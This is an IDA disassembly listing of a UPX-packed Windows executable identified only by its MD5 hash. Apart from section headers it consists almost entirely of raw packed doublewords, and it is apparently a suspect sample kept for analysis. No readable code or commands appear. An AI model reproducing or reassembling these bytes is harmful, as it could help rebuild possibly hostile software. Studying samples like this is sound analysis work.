;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 9F5537FB686066969DD8E9AF7A1DE8A3
; File Name : u:\work\9f5537fb686066969dd8e9af7a1de8a3_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 31420000
; Section 1. (virtual address 00001000)
; Virtual size : 00005000 ( 20480.)
; Section size in file : 00005000 ( 20480.)
; Offset to raw data for section: 00001000
; Flags E0000080: Bss Executable Readable Writable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX0 segment para public 'CODE' use32
assume cs:UPX0
;org 31421000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 1400h dup(0)
UPX0 ends
; Section 2. (virtual address 00006000)
; Virtual size : 00002000 ( 8192.)
; Section size in file : 00002000 ( 8192.)
; Offset to raw data for section: 00006000
; Flags E0000060: Text Data Executable Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
UPX1 segment para public 'CODE' use32
assume cs:UPX1
;org 31426000h
assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing
dd 0E8D2FE1Fh, 87778778h, 0BE817BB1h, 26493A6Dh, 94F32D5Dh
dd 796894F9h, 17958305h, 4B2E2B70h, 782E2F8Eh, 84107912h
dd 6D876339h, 0A7A36950h, 0F37DC7CEh, 0DA643A0h, 58916A7Fh
dd 0FDF5257Ah, 10448688h, 0C2A4A3E0h, 6628547Ch, 0F04568F4h
dd 0B70D6F7Dh, 4D804F4Eh, 1275AF6Fh, 5FC5A7Eh, 64838A8Eh
dd 284D7DFCh, 21177790h, 88102164h, 0E3D518C2h, 7B7A1553h
dd 0C338F447h, 4C91C7A3h, 8780FBF8h, 0D843DF1h, 5893657Ch
dd 15872EEAh, 0D95E317h, 5CE82B70h, 7060BE43h, 8468760Dh
dd 0CB06A695h, 7B120451h, 0C7299320h, 2F786841h, 4BD96419h
dd 0C8D583E3h, 28803D1Bh, 494A2B2Fh, 4B4A764Ch, 2E8C0E8Eh
dd 2B800D2Eh, 8744004Bh, 0D2204E43h, 2BE7E47Dh, 0BCFBCD38h
dd 87B84B74h, 27878027h, 0BBB12326h, 705C34F3h, 7C5C3CF3h
dd 0B7FB2F60h, 77123887h, 537909F5h, 8787A381h, 68F22187h
dd 7B8720F2h, 0B9A17AA9h, 9AF87C82h, 5C2C527Bh, 7A9BB860h
dd 0DDF0AB72h, 0C38323F2h, 0F2792885h, 62B28660h, 0FB6EA95Ah
dd 5B617BB8h, 87C2639Bh, 6E6488C3h, 6CF53E3Eh, 4882FB4Fh
dd 0BB24C704h, 1794FB0Dh, 40C057C3h, 0C6215F21h, 5F23A34h
dd 0DD8B729Ch, 5B97871Eh, 77DCDDA3h, 25F3B048h, 0A3FD6874h
dd 0FB7B05DCh, 9D8762BBh, 0C67795A0h, 704DF605h, 0AE2F9CA9h
dd 21B8FD21h, 1CF56B0Ch, 35CF8783h, 0B9536240h, 0E1BB7B21h
dd 3CF2818Fh, 5B939C6Dh, 453B067h, 0B0B0763Ah, 39F27B93h
dd 8785C698h, 3DF3FCA7h, 0DF32E74h, 78F22F68h, 340CB8FCh
dd 542B19F3h, 1017877Ah, 0F26BA780h, 8FBEF3A0h, 7025F0A0h
dd 7B6E7040h, 0CE7FF06Ah, 21871717h, 1983F83Fh, 7D730421h
dd 0F47E0702h, 1996FB8Bh, 9F8E3972h, 2277817Eh, 0D303539h
dd 0BA1C23C3h, 33C3CF73h, 1F785FF8h, 4B36BB25h, 0A376F3B1h
dd 7C879915h, 696CCE77h, 0FB39BA7Bh, 0EA887B81h, 0F3F621E1h
dd 0FDC66E96h, 0FE195ABAh, 0A0F88512h, 1454A810h, 7CA407C4h
dd 28EED91Ch, 7F5DF11Ch, 0F881CE3h, 0BF2FF7FEh, 73D3A0FDh
dd 841DFB78h, 0C3101078h, 5BB961C7h, 21217C9Ah, 0C5F180F3h
dd 87FD67A8h, 9694A34Ch, 5C4AFC77h, 687CBFFBh, 0F72F5B76h
dd 0F31E4E4Fh, 28219C42h, 0A796F677h, 0F8978387h, 0F23478DFh
dd 0E0FDF07Fh, 0FBA0C65Fh, 0E5F11993h, 0E6F073ACh, 97C66F0Dh
dd 0F50A831Eh, 313F709Eh, 44CF0612h, 703D9347h, 0CDF18815h
dd 3CBC8EB4h, 0B34EA0A0h, 5EF8E87Eh, 9C2C2FD1h, 0B9940327h
dd 0F2EF7B97h, 3E7EF06Eh, 0FA4B3A57h, 87C20685h, 3EF5E465h
dd 0CE7A5979h, 0A7911B77h, 2865580h, 0D7E4064h, 723C120Eh
dd 0B1FE438h, 61A49464h, 76EC537Fh, 14A1C8F4h, 394812A0h
dd 0C675A01Eh, 4BA074C9h, 0D7860EEh, 0A1C54163h, 4F89B4E6h
dd 0E479EE7Fh, 0FA0A921h, 55E077DDh, 35FB2102h, 0BA7D716Ch
dd 88CBF4F3h, 35F31070h, 5275F988h, 3BFDB0C1h, 7890F2DCh
dd 68B5D6E6h, 71157FD1h, 0E329603Ch, 12A314D5h, 6F7FE11Bh
dd 4BE8E87Ch, 0A1C2C7A3h, 0CC540F5h, 4EE644Ah, 0F6944D0Eh
dd 37FE99C8h, 287C4DCCh, 0C736B891h, 25C10410h, 0BCBF61A1h
dd 93866964h, 8F0D6B60h, 1055E6B8h, 2B746108h, 38341078h
dd 0FF72AE0Ch, 77882BEFh, 0F5A32B50h, 6294D3AFh, 288480D3h
dd 0FDDE58FCh, 2B2E56EBh, 74892E83h, 2ABA55A3h, 2E667C9Ch
dd 65C75446h, 0CE41F30Fh, 0D5AE4BAEh, 0E06533A3h, 17122FCAh
dd 0C787AF4Dh, 0D1BA1859h, 7C7C054h, 444C6819h, 0FCF2470Ch
dd 0FE38F8CEh, 7FF9CECCh, 478E8303h, 0BF73BB67h, 0F81C4D21h
dd 98B9211Bh, 504DFD7Bh, 0D7A5727Ah, 0D11E0E89h, 126A0DFEh
dd 0AB87A2EDh, 0F0859470h, 0DA37E514h, 8A7B9384h, 87CF86CEh
dd 0AA4B1C2Dh, 1BEB98C1h, 0BAF9898Fh, 787E6330h, 0D5EC972Ah
dd 86077B15h, 1BF00A6Eh, 24F4DF7Eh, 9098560Dh, 4CD02ECEh
dd 2572F6Dh, 0B3CD2F2Fh, 0F4D69EC2h, 7D747027h, 133A9472h
dd 0F5668F17h, 0A469083Bh, 937B5C5Ch, 4B15E157h, 63C04034h
dd 38865CB8h, 0C31F1F38h, 6031A2ACh, 0F17C0E5Ch, 73466554h
dd 0E74EE573h, 0AA26B848h, 4C12AEC3h, 76EA7083h, 7B103F41h
dd 0B9E19A2h, 1B6458ADh, 0F5FF2645h, 7A66CDCCh, 60581374h
dd 131DE97Ah, 61932796h, 60642F00h, 85F48C6Ch, 35775CFBh
dd 7579F164h, 4774BF50h, 1E86969Bh, 48F19CC0h, 34FCD994h
dd 0A8D5EBC4h, 5927AD90h, 0B0F076E3h, 7ACD567Dh, 8C052A73h
dd 63692084h, 0C011DD07h, 6512D87Dh, 0CF249D2Eh, 69E7CE1Fh
dd 2228EC3Dh, 0CC7B71E4h, 7ECC1610h, 5C3400BEh, 86B56A1Fh
dd 27CE4E6Dh, 0CC752CF2h, 71F86EF0h, 0B7E17E39h, 501717BEh
dd 18129604h, 3FE0642Dh, 8F4991DCh, 7046A6F2h, 4698A9A0h
dd 0C40BC5B4h, 6687348Bh, 711259F5h, 97199710h, 2149FE76h
dd 58333DFCh, 95C2B247h, 2F627C07h, 3DF098A8h, 39836883h
dd 1EEA5867h, 98A88621h, 822F717Ch, 9E1F3182h, 5110032Ah
dd 0A0479976h, 10AA1A98h, 12A3CB17h, 2BA45C68h, 1E3CF973h
dd 1EFD75BFh, 1027A50Bh, 189CD1C5h, 1773611Eh, 0A42F0DD8h
dd 0F184E05Eh, 1C49980Dh, 5E6F50A1h, 4F7B9256h, 0BBFF38ECh
dd 0DFB0C7CCh, 4310A098h, 2D99E3FBh, 3DF83B04h, 0ED60AB80h
dd 7FFED617h, 10874B35h, 9E657E38h, 3E3195E8h, 0D0B8E014h
dd 6385636h, 1C3E744Bh, 7A61E3A6h, 7048C001h, 0F925883Eh
dd 5FF4779Eh, 495E19F8h, 79BDFD77h, 44C5A1D6h, 7FA870A7h
dd 88C44478h, 0B4C82EE8h, 7469700Eh, 0B38C3A27h, 248F4459h
dd 0CB696789h, 0FA9C9474h, 726B7A33h, 0D8800016h, 0D94649BDh
dd 0F15D33C6h, 0A33BD2FDh, 0D68808D8h, 0EADA7C05h, 36B87744h
dd 7A039064h, 0FC7A8A12h, 3F840563h, 887A3261h, 0D84B9C7Ah
dd 7A6E3010h, 0AACF4DAFh, 0DF45057Bh, 0EE71079h, 4E9EB49Eh
dd 4232581Ch, 6322CFB4h, 0A4FFCF4Ch, 120EFC98h, 0EE8C5208h
dd 9EB09BF4h, 26B018F8h, 2EF1C72h, 5F46635Dh, 0DA5078FCh
dd 4E337847h, 44A1C113h, 0E0C1CA14h, 9C0FC59Ah, 0A4791F2Ch
dd 49062877h, 0BF0FBB9Ch, 0D4104375h, 0AB50B875h, 0C940B6A4h
dd 9D1770B1h, 0A374027Ch, 0AA303D5Ah, 0A555BD80h, 0AE635957h
dd 3856A364h, 7E086AA6h, 34E84194h, 38C4803Ch, 0BA09E8AEh
dd 63A6283Ch, 21436668h, 0ECCF4B17h, 0F959EF75h, 1F91D481h
dd 90048693h, 6E5CDDF8h, 105D7E78h, 5DE5642Ah, 648A237Fh
dd 0EE8C6A0Eh, 0F1E591BBh, 0EC72971Dh, 3B00412h, 1CC99BBBh
dd 0B1C63174h, 0E165A103h, 0E8992C9Ch, 0F4E7915Ch, 0A4B4BB31h
dd 0B7005C56h, 54FA3095h, 801C7D54h, 1E8C6D74h, 4B61D87Ah
dd 7008025Bh, 0F7F1260Ch, 8CBEA576h, 6429B427h, 0F8CB97E4h
dd 75C9CD9h, 7DDC4DD0h, 0CDA80063h, 2F6AFA80h, 220C2F4Fh
dd 72B38149h, 0C80766Ch, 71D81033h, 0B250CF2Bh, 55450CB6h
dd 1F95FDB1h, 0D8395811h, 77842D87h, 4DC2C190h, 289CE6AFh
dd 76EE50D4h, 23487A88h, 2D3FC735h, 0F4787180h, 106DFB9Ch
dd 8C0D2043h, 60FF963Ah, 0FD6B59BDh, 0D17228F3h, 0C78F07CEh
dd 4439F357h, 10B97B2Fh, 30F33554h, 2800F34Ch, 0D88C35F1h
dd 967E52CCh, 6410A033h, 25EFA063h, 888D21D2h, 7010AA79h
dd 0B9F5946Ah, 950CBBC9h, 6968AF75h, 8C1776FAh, 6C71CA12h
dd 8035895Bh, 0E90E5429h, 606028FDh, 0F15210EFh, 142CD891h
dd 0B23825C8h, 3EB8957Bh
dd 934C131Bh, 0E2D36148h, 2116AD00h, 7B05882Dh, 0D31F3D9Eh
dd 8846A533h, 2B284929h, 7198D466h, 8C4DBC8Fh, 6F82AEC5h
dd 47921512h, 2D0FA889h, 0CBF4394h, 6393207Dh, 229D066Fh
dd 5D4CF4C7h, 7D847621h, 4E9F4C27h, 0C707F93h, 99842097h
dd 272A66FEh, 18572929h, 0CA114977h, 24E9D93Ch, 0C2C05D75h
dd 0A558A33Ah, 0CA6BC9D7h, 694BD694h, 55217793h, 0CE1281BAh
dd 0E195BCC9h, 74F844C4h, 6C28D028h, 55F0CAEh, 25B85428h
dd 3C218461h, 3B0458C2h, 5C04F32Fh, 0DDBDFB6Ch, 669AA22h
dd 1C62FF6Fh, 0F847878Dh, 6CF019BAh, 8F433E66h, 5CF89104h
dd 0BEF47843h, 2CADAEA3h, 27563CF3h, 2E2FD422h, 486065A3h
dd 57591E0Ch, 0F0EEA40Bh, 28885695h, 782E2861h, 7BBBD4D2h
dd 0ED0F994Ch, 318C35BCh, 0F71316F4h, 88748210h, 0B170BF87h
dd 4CE311EEh, 5652B44Ch, 0E1D50B34h, 72720D95h, 6258C428h
dd 466E7960h, 7FBE2CD9h, 794307C0h, 0D589B60Ch, 0F3743805h
dd 29707978h, 275C3CF5h, 0E3194C59h, 0AB6948BDh, 0C5C217Bh
dd 7F803690h, 7FC3B46Dh, 1E57B058h, 4B4BBF83h, 0B980B09Ch
dd 73FD689Fh, 3E01C8ACh, 0F37A78CEh, 784B6A25h, 8B085E3Fh
dd 79E5BA79h, 2BBC92B1h, 0DB699BBEh, 8ACD034Dh, 0BB5D284Dh
dd 5ECEE5FBh, 0D59F30F8h, 381E14CDh, 39886FE6h, 0C3104DEDh
dd 0E0B69B49h, 0CF141045h, 3F37883Ch, 61C91814h, 0DD352C86h
dd 54BDAB6Ch, 42CA2A4h, 84758678h, 4BD94CC2h, 530178C1h
dd 0AB943BFh, 0AB9F37Ah, 9993CF17h, 90D95153h, 5BBF7B60h
dd 865DDBD4h, 5B45B4EEh, 12690Ah, 0A2493880h, 0BC934450h
dd 0F28996Bh, 148E375Eh, 0EC66AC69h, 0B544106Dh, 7396351Ah
dd 0EF40107Bh, 0E51E4644h, 2C2B42CDh, 0A8FB2A2Bh, 0F43F98C9h
dd 7CBAE05Ch, 6B15FA5Bh, 761C48E0h, 90A8C98Fh, 70BB6EACh
dd 0C3963651h, 0F12F3B0Fh, 0F810107Eh, 5FFC65F1h, 25370660h
dd 6C9415DAh, 788AACB8h, 0B94C2BE9h, 7A031314h, 0F8934279h
dd 0E2AC109Eh, 6235850Fh, 0CB324E00h, 0A4B5570Ch, 1F0226DBh
dd 0DB1D740Dh, 2B84DC86h, 62A1AA29h, 42FE2E6Bh, 0A44610A0h
dd 5E2EA0F4h, 20612681h, 80A2126Ah, 267D68BAh, 97332EB8h
dd 741EEFDCh, 9425F190h, 0A7877D75h, 5D958F18h, 427C6787h
dd 3B84DBBBh, 0F2679F0Ch, 27B1FCB4h, 0C9031C5h, 921328A7h
dd 1C38273Ah, 0DD61FDC2h, 3C741C1Dh, 5391D7DBh, 6C802703h
dd 0E63067A0h, 82B6D594h, 6D580610h, 9A931A36h, 24B9B72Bh
dd 3D27993Ah, 0D479E83Bh, 81E6503h, 0C84B44D6h, 0AB7F69AEh
dd 7A46A33Bh, 0F842AE9Eh, 0E3757281h, 0D3C810CCh, 0C981BDBh
dd 0FA5379A0h, 8CDB0304h, 0FE71A183h, 0CF459CB5h, 51983D2Ah
dd 96B58E08h, 617C1C75h, 101B639Ah, 946B5BCAh, 244C37CDh
dd 6BFE936Bh, 0C818E1D6h, 4D118362h, 41083C80h, 0E85D5438h
dd 0AAE8F7EBh, 8B5B01Ch, 0E83DF46Bh, 0EC7E9724h, 0A41642Ch
dd 0E434E09Ch, 0DC44D83Ch, 3F5BE94Ch, 0D454D0F6h, 4164C85Ch
dd 0CCB09C0Ah, 0C46CC060h, 0E774B868h, 0BC64F63Fh, 0B47CB070h
dd 80A83584h, 5BE9B09Ch, 88A08CACh, 0FDD694A4h, 90980A41h
dd 7CFF9C9Ch, 78F31EC5h, 0DB14AB4Fh, 0C100A2A6h, 7A84C815h
dd 0B71FBF4h, 94F44C6Ah, 39247B0Eh, 32F5E8FDh, 93748721h
dd 35F56290h, 0CC759C40h, 0B1416224h, 0FF738804h, 0AC10410Ch
dd 4FD0D335h, 0CE4A1A0Fh, 0BC7E35B4h, 0FC467515h, 0E2C431FCh
dd 362F7C1Dh, 52A3430Ah, 724C6D59h, 5F166EDAh, 396F4642h
dd 27E2503Ah, 559986Ch, 8060CC90h, 93E46BF0h, 0BAFA3A9Bh
dd 226DE1EBh, 6318EDD7h, 1B2D3F7Bh, 0A607DCF8h, 0D56988D2h
dd 733DF229h, 4A8712E6h, 0F8B995A3h, 0B4422ABBh, 0A4254049h
dd 89708642h, 7325F05Dh, 77857FAAh, 22744DCFh, 80748721h
dd 8FE177EBh, 0F6AE7B86h, 83F8BB86h, 56AD0A87h, 26C5BE23h
dd 270E1AC2h, 0E06BCA1Ch, 104B177Ch, 2EA27120h, 0F9703740h
dd 0BF757C72h, 71A321C8h, 0F80DF773h, 18E33155h, 2781770Dh
dd 66F1545Dh, 45E5D59Ch, 7B87FC4Ah, 83F93BAFh, 0CD75C609h
dd 27E7EE5Bh, 13DE25FFh, 337436Eh, 15DA220Bh, 9E2F4461h
dd 0E10B7857h, 85C600CFh, 8E86877Ch, 19F00744h, 4B841423h
dd 70F38D77h, 0D2A48B43h, 0A0CBCA0Eh, 2FD8DB46h, 0E42F57E6h
dd 7A5DE6A1h, 6B2180AEh, 5D165DBBh, 0CBC38776h, 0BB8A960Dh
dd 1099D4F6h, 0ABDE5F68h, 0EEE6ABC6h, 0FCB9B9F8h, 28D15508h
dd 682AD51Ah, 0F7BA3D36h, 0C2184A8Dh, 8AD22412h, 9881A4A7h
dd 73844234h, 1C10C87Bh, 7B0AA536h, 6968437Eh, 0AF3AC25Fh
dd 14986A8Fh, 73F8BE71h, 0C85341A7h, 2D1773C8h, 0FC2FEB2Eh
dd 0F8B400A0h, 296B9EA0h, 101E6435h, 856774DDh, 0A16C1A8Ch
dd 2BF17E96h, 7A738E19h, 70402812h, 0D82385D7h, 0AA7D5425h
dd 600C78EEh, 0B7F6971h, 68793FF5h, 786C617Dh, 71A5FD6Bh
dd 6F7EA037h, 3AC5D276h, 0C88F9A3h, 0BFAD2B75h, 0C6696829h
dd 41597999h, 42605C34h, 695FD95h, 0A00EA069h, 5E33DDFEh
dd 976C3554h, 14615DEEh, 93DA7D0Fh, 0F30D758Ah, 1DC0C80Eh
dd 1082A593h, 0B9634B47h, 0EEF918B0h, 0FA86D74h, 16D11A4Eh
dd 0E86C7068h, 57FF33DBh, 2E60A129h, 0A0A02484h, 8E604FCAh
dd 0C452E46h, 1B69B67Dh, 193952A4h, 0CF3354E4h, 685828ABh
dd 217B7060h, 0D2731A84h, 0F32D7726h, 22B699BEh, 564BDA2Fh
dd 2E2B542Eh, 0B1E860FCh, 5D5F782Dh, 22B6217Bh, 7C742A72h
dd 0EA1AB758h, 50D72574h, 0F19ACF79h, 59A62BBBh, 0ECF61136h
dd 6B8E8C40h, 2466444Ch, 8F01364Eh, 3BD5A67Ch, 50656C14h
dd 1002DC55h, 0EAB9944Dh, 8CA02255h, 5A8C7168h, 0B75843A8h
dd 96804E02h, 3F055A65h, 79660CF5h, 8D2E8403h, 307CB986h
dd 0CD876466h, 0C1CB3D98h, 873D5758h, 702A6777h, 19BB2F18h
dd 643E284Bh, 4CF1C50Eh, 0CF4BD80Ch, 2FAED144h, 75E9C9B0h
dd 0E037D4CEh, 64F8AC7Eh, 0A09C0A41h, 9814A40Ch, 0E9309C18h
dd 90F63F5Bh, 88589444h, 614CA968h, 0CF788CB4h, 1BC773FCh
dd 1C049A19h, 0F30681C6h, 0D91C29DAh, 0CCBC4560h, 0B3A04E70h
dd 766F0D0Ah, 0DE356531h, 5271E6E2h, 0C5DBFB46h, 0F23E710Dh
dd 0F0983Ch, 0F43F8C12h, 0CC710CC8h, 12F0210Ch, 0F3CBF91Bh
dd 0FCC4A621h, 2575AD9h, 98FB47B9h, 7DB8FB7Bh, 0FEC1B52Fh
dd 852132F3h, 28E568B7h, 456A6016h, 6445AE7Fh, 765E961Eh
dd 2890476Ch, 0E054973Ah, 5838DA19h, 3304B239h, 0AFBE4710h
dd 0B421CB7Eh, 6339A1FEh, 0B7D95DABh, 0C0798C2Ch, 0EEF9987Fh
dd 0E7F37738h, 46B9F06Fh, 3067BD6Fh, 7D856CBFh, 5D211548h
dd 98CBC268h, 0C7286512h, 0FE6845A0h, 29840988h, 6D4F0C47h
dd 4920427Eh, 18DFC372h, 0C685F27Eh, 8C2B2AA9h, 69EC445h
dd 452BA0CBh, 7793C940h, 0D8B9B621h, 0CE4AC5CBh, 40A66310h
dd 1D9A1DC8h, 0B010BA5Eh, 234F4337h, 0C33EA98Eh, 0EF6275C1h
dd 39AE734Dh, 346A266Ah, 236BE88h, 0BE499632h, 0CE3943C3h
dd 5485E8B4h, 0E8CE68CDh, 307F60CFh, 186D9374h, 5560F89Dh
dd 0D76171B5h, 294AC266h, 3C4B7425h, 94234528h, 120510FBh
dd 0B438696Bh, 8C521E9Fh, 507E8778h, 0D168807Dh, 8CE9E197h
dd 29786388h, 0F58FA7E3h, 0A43F562h, 7391F96Ch, 0D5FD7C55h
dd 79C985C6h, 53940B6Fh, 74BCF3B0h, 70F399F3h, 0CDCA4E92h
dd 3B2BDB7Ah, 3D7D241Ch
dd 204E4E7Dh, 0DA787831h, 897A547Ah, 0F74CC76Ch, 2A5C7A7Eh
dd 0F849392Bh, 0CF078787h, 8D7979F7h, 169FBF5h, 9C52942Ah
dd 319F8E42h, 0C69892E3h, 6A359D7h, 8782ED3Ch, 26628787h
dd 0FDD84A19h, 0ECE71267h, 0FC41EC87h, 4DF75EDEh, 0DD2465B6h
dd 2CA73B1h, 87480A1Dh, 4F678787h, 11021735h, 57191414h
dd 5848564Ch, 15171B50h, 110C1908h, 431D141Ah, 87853558h
dd 312B8323h, 6D4E583Dh, 16112F71h, 0B0F171Ch, 582C3658h
dd 5149564Dh, 0AC73C345h, 78F69C4Ch, 0BC797CACh, 0B7458FCCh
dd 0E8D8768Bh, 107C0CF8h, 448BB776h, 307120A7h, 48AC0C44h
dd 1CA14FB7h, 685A583Dh, 95784832h, 80463B07h, 0E1B6B38h
dd 0D0A560Eh, 0C5CE4E06h, 7F780FCDh, 0EF141C1Dh, 0B91E771Dh
dd 8703078Ah, 191D0B1Dh, 76101B0Ah, 1A170A67h, 101B0017h
dd 0A31F1619h, 0AAC1C307h, 740C1D67h, 1A561C0Ah, 19780211h
dd 0FDA01B50h, 13109C15h, 0C741519h, 5C00557Eh, 0C1C315CBh
dd 17147E78h, 134F1A76h, 0C68E853Fh, 7A0E5E15h, 0E0C5602h
dd 170C6963h, 0FD165608h, 6FF455F8h, 5F0B7711h, 0F887734Bh
dd 7700F515h, 140D1C19h, 331D550Ch, 6A30E11h, 4BF80ACBh
dd 0BDE1617h, 1A560C36h, 0A772B805h, 1F11371Fh, 0F00784Ah
dd 2307CB19h, 1A125483h, 0E378D51Ah, 191E1902h, 8030FFD0h
dd 1D2556CEh, 19D7245Bh, 8E95801Ah, 1D1C1B87h, 11101F1Eh
dd 15141312h, 0A09BD16h, 0F0E0D8Fh, 87BE0100h, 1D7628A7h
dd 3E3D3C3Bh, 3231303Fh, 36353433h, 2C292837h, 8710BB87h
dd 2F2E2D2Ch, 63222120h, 0C0C105Bh, 57574208h, 43E3885Dh
dd 57730BC8h, 856EF1Dh, 3470810h, 76CE8306h, 0B5E7745h
dd 1C7E161Bh, 1E16115Eh, 517F430Eh, 494505CFh, 0C6B5E41h
dd 2093D863h, 188EC383h, 4F4A4945h, 424979D0h, 57484840h
dd 0F887A71Dh, 78A794F5h, 4B25A790h, 96C11EB1h, 87A31787h
dd 7D0DF579h, 7EF286F3h, 3E7FE144h, 3E48547Eh, 7FF0E14Ch
dd 93959A3Fh, 904C578Fh, 6A29072h, 561F1DA7h, 0B1E1EB09h
dd 0A7879779h, 0C5856A86h, 7F6E85E9h, 0D2100AB9h, 0D21E853Ah
dd 6CC26885h, 62E0D164h, 8F23C987h, 89E08BB1h, 97AFE70h
dd 27E868B8h, 21EA4FB3h, 77EB64EEh, 4200CB83h, 92F9C6Ch
dd 9427205h, 0C683E53Dh, 89E58B95h, 8971F17Ch, 3869E47Ch
dd 85F695CBh, 9B8B1F5Bh, 0A4646888h, 1821CA73h, 45F7B1E3h
dd 795D978Eh, 0D97C6CA1h, 0E609B26Fh, 1910F553h, 0EE3E6FCBh
dd 9A62D5E9h, 506965EEh, 951715E7h, 78B028CAh, 2FA46CE1h
dd 366A5D2Dh, 0A794B8DCh, 6AE995A6h, 8F95E131h, 0BC6C782Ch
dd 9B3B242h, 0FFCB6443h, 5C8785A5h, 0B762599Ch, 1EF7B5B5h
dd 83CEF954h, 664714E7h, 0FBC0C883h, 256AB5BBh, 65B3B1D0h
dd 17E5CA07h, 735CD55Dh, 0EEDE3022h, 0B186B3B8h, 34636C1Ch
dd 8B93DF51h, 0A187C2E4h, 6E91CB8Fh, 95E8C4Ch, 8176848Dh
dd 51976B43h, 1787133Eh, 274F8F0Eh, 943F1EA6h, 796ED8D0h
dd 9587BDCFh, 85919491h, 971977C3h, 549984CFh, 848DB279h
dd 848A2284h, 85C7879Dh, 8D848F93h, 0BFAED3D2h, 21D2814Ch
dd 52525DCCh, 0EBD4B11Eh, 0C6CFF9E8h, 0E8871F88h, 0B1FB1BE5h
dd 48EA09B5h, 294D61C7h, 72EDA16Ch, 8787E90Ah, 9529458h
dd 0DDAA93B0h, 99F8AD6Ah, 17D22AE2h, 0E252F56Ch, 3E86A7B0h
dd 0F36AC183h, 0BB3F32E2h, 0A3E3D3E6h, 9458DB61h, 87A5DA14h
dd 0C58785C7h, 0A7E695FDh, 93F990DAh, 0B06A2D3Ch, 56EE67C5h
dd 0A06A93F5h, 6A22E2FDh, 87E271E5h, 22B57371h, 0A8EE8068h
dd 71E315Ah, 0FF6A8685h, 0C31716A3h, 0EDBA22D1h, 0FA6AFD7Ah
dd 0B322E97Ch, 81C1B78Fh, 0FD07381Fh, 3A352B87h, 0B02B600Ah
dd 71B78CC7h, 781A8687h, 0FB3B287Ah, 372F2C3Dh, 9B23952Ah
dd 28583387h, 2A3F372Ah, 49583539h, 39346FB5h, 2A7A3536h
dd 721AE893h, 0CF6D1ED3h, 0CF23CEEEh, 0C31F137Bh, 4B76080Dh
dd 0CE671962h, 355F930Ch, 59204A5Bh, 564A4A4Ah, 1EAB2049h
dd 5860AE52h, 22F34A44h, 0DC4BB0B1h, 94637F0Bh, 745AFDA3h
dd 7C785B87h, 586C7269h, 0F5A2A67Dh, 11D8AC62h, 2B333478h
dd 7CE9282Bh, 0EFCFF007h, 329870FAh, 95806F0Bh, 165C782Fh
dd 17781C78h, 420B780Dh, 26A6B00Ch, 71794814h, 4D7841F4h
dd 0A4B8145Bh, 7F5665EEh, 4AD3A278h, 70F1B758h, 432FA258h
dd 0E734EBFBh, 3E8A787Bh, 0B9E8665Bh, 387F3F7Eh, 0A97E787Eh
dd 683E9F87h, 0F26D6779h, 783098F0h, 0F93C7837h, 86638785h
dd 8A021261h, 5064319Ch, 0C5D48D7h, 992B1F68h, 6B04FD44h
dd 480DA724h, 0D6C57C78h, 7F24CEC1h, 247022C5h, 0A4E4F19h
dd 7F5635AFh, 5640784Eh, 4363480Fh, 3115F1E3h, 903B9478h
dd 811B4778h, 1C760178h, 7CA470DAh, 1587588Eh, 78876E38h
dd 7678A6A6h, 79E76E78h, 71C75E7Ah, 50386A6Bh, 0B9697B61h
dd 0F305BB3Eh, 0AB0CA114h, 0C39C5108h, 0E452E3D4h, 0A0655D13h
dd 68E715CBh, 637C3076h, 2515B72Ch, 222C6BAFh, 5A211B5Eh
dd 0FBB3BF24h, 3DC1874Ch, 787DFF1Dh, 30687B73h, 0BD8787C0h
dd 76C068A6h, 50127D73h, 0C9744161h, 0D0E369A8h, 537B878h
dd 0A1940799h, 25278D56h, 6493F2F0h, 90E769B1h, 30685344h
dd 0CA560418h, 8C74A9EFh, 74D818DBh, 0ED9C44F8h, 74C974D8h
dd 4A414386h, 0F074D878h, 78717838h, 0FC037B94h, 787F815Fh
dd 37386CEDh, 0C7380804h, 7EB0DD94h, 6B3B7F78h, 0F087BA01h
dd 786BFD00h, 91DE23D3h, 6080686Bh, 579C71B7h, 5B768687h
dd 0AC2048B9h, 0FC70C638h, 5AB9CF0h, 68C13BAAh, 0C0798796h
dd 14E1968h, 0D558748Ah, 0E7077F75h, 778A6D9Dh, 87960A0h
dd 77E877FCh, 77FC5D01h, 357877EDh, 7A7E84E6h, 1477FC07h
dd 0FCD2A677h, 0D0E278FFh, 71473B17h, 676BB0F4h, 28201611h
dd 0B8DEA358h, 780A28B2h, 41793C3Eh, 44FC37B1h, 6A44134Ah
dd 37A0D6Dh, 3944FC75h, 0EC64782Bh, 64D78779h, 0BE7E935Ah
dd 0B5D2424h, 1B081124h, 0E387810Dh, 94F91E5Ch, 9C877F64h
dd 3C1D2B78h, 1F0D1A1Dh, 824F0E11h, 1FFD4D60h, 121C39DFh
dd 172C190Dh, 94E1CE9Ch, 6F161D13h, 6A17340Bh, 0C715080Dh
dd 192EE7A5h, 391D0D14h, 5008376Fh, 0B5C1B17h, 0F5309220h
dd 0E3B784Ch, 1D4B4719h, 9B492ADBh, 80153401h, 8D7D1563h
dd 2C27691Dh, 2F01190Ah, 0EDAD55CDh, 493B6F4Dh, 2A2A6219h
dd 1055C3E5h, 102C7D17h, 0B2E6C74h, 0DB23130Dh, 503920A3h
dd 0DD003D37h, 0F4B151Fh, 3F4D1642h, 6A668B8Dh, 308C10EFh
dd 7282C2Ch, 2F4A5844h, 85972ACDh, 75333758h, 0E7337972h
dd 12A71E3Ch, 34557AC3h, 42551F7Ch, 600D5D58h, 0B2200322h
dd 12C5057h, 0DE155ECDh, 8DBA2CEh, 6DFB1BFEh, 0F6D19657h
dd 55BF7A22h, 3AB10AEBh, 0E72EC9F3h, 53783F2Fh, 0DB233FC2h
dd 9D1C8E8Ch, 3AB30BB3h, 15F52F83h, 0D11B0E0Bh, 0A2110FB3h
dd 892BF30Fh, 6F274A7Bh, 0E2119F0Dh, 7FCD9E56h, 4E4F407Bh
